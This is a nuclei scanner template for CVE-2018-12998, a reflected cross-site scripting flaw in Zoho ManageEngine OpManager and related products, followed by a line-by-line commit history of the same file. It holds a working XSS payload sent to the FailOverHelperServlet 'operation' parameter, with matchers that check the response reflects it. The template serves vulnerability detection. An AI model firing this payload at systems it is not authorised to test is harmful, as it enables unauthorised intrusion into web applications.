nuclei-templates/cves/2018/CVE-2018-12998.yaml

id: CVE-2018-12998

info:
  name: Zoho manageengine Arbitrary Reflected XSS
  author: pikpikcu
  severity: medium
  description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
  reference:
    - https://github.com/unh3x/just4cve/issues/10
    - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12998
  tags: cve,cve2018,zoho,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html
Create CVE-2018-12998.yaml 2021-09-15 04:00:16 +00:00			`id: CVE-2018-12998`

			`info:`
			`name: Zoho manageengine Arbitrary Reflected XSS`
			`author: pikpikcu`
			`severity: medium`
Update CVE-2018-12998.yaml 2021-09-15 04:31:34 +00:00			`description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.`
Create CVE-2018-12998.yaml 2021-09-15 04:00:16 +00:00			`reference:`
			`- https://github.com/unh3x/just4cve/issues/10`
			`- http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html`
Update CVE-2018-12998.yaml 2021-09-16 17:33:45 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2018-12998`
			`tags: cve,cve2018,zoho,xss`
Create CVE-2018-12998.yaml 2021-09-15 04:00:16 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2018-12998.yaml 2021-09-16 17:33:45 +00:00			`- "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"`
Create CVE-2018-12998.yaml 2021-09-15 04:00:16 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: word`
			`words:`
Update CVE-2018-12998.yaml 2021-09-16 17:33:45 +00:00			`- "</script><script>alert(document.domain)</script>"`
Create CVE-2018-12998.yaml 2021-09-15 04:00:16 +00:00			`part: body`

			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: header`
Update CVE-2018-12998.yaml 2021-09-16 17:33:45 +00:00			`words:`
			`- text/html`